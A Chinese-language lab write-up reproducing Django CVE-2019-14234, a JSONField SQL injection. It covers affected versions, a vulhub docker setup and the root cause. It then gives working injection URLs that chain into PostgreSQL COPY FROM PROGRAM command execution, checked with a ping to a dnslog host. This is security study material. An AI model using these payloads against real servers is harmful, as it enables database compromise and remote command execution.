漏洞描述
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。
什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。
相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQL的一些特点。
参考:https://cloud.tencent.com/developer/article/1549898
影响版本
Django
1.11.x before 1.11.23
2.1.x before 2.1.11
2.2.x before 2.2.4
FOFA语句
1 | 无 |
环境搭建
docker搭建
1 | git clone https://github.com/vulhub/vulhub.gitcd vulhub/django/CVE-2019-14234/docker-compose up -d |
漏洞复现
漏洞原理
该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。
Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。
通过JSONField类获得KeyTransform类并生成sql语句的位置。
其中key_name是可控的字符串,最终生成的语句是WHERE (field->’[key_name]’) = ‘value’,因此可以进行SQL注入。
漏洞利用
浏览器访问:
1 | http://ip:8000/admin/vuln/collection/ |
构造URL进行查询;
1 | http://ip:8000/admin/vuln/collection/?detail__a%27b=123 |
注入成功!
结合CVE-2019-9193漏洞,验证命令注入语句,构造如下:
1 | http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20 |
页面结果出现报错。报错原因是no results to fetch,说明语句已经成功执行;
然后用dnslog检测是否可以执行命令;
1 | http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping xxxx.dnslog.cn'--%20 |
当然,也可以直接进入到容器,看到ping命令执行成功;
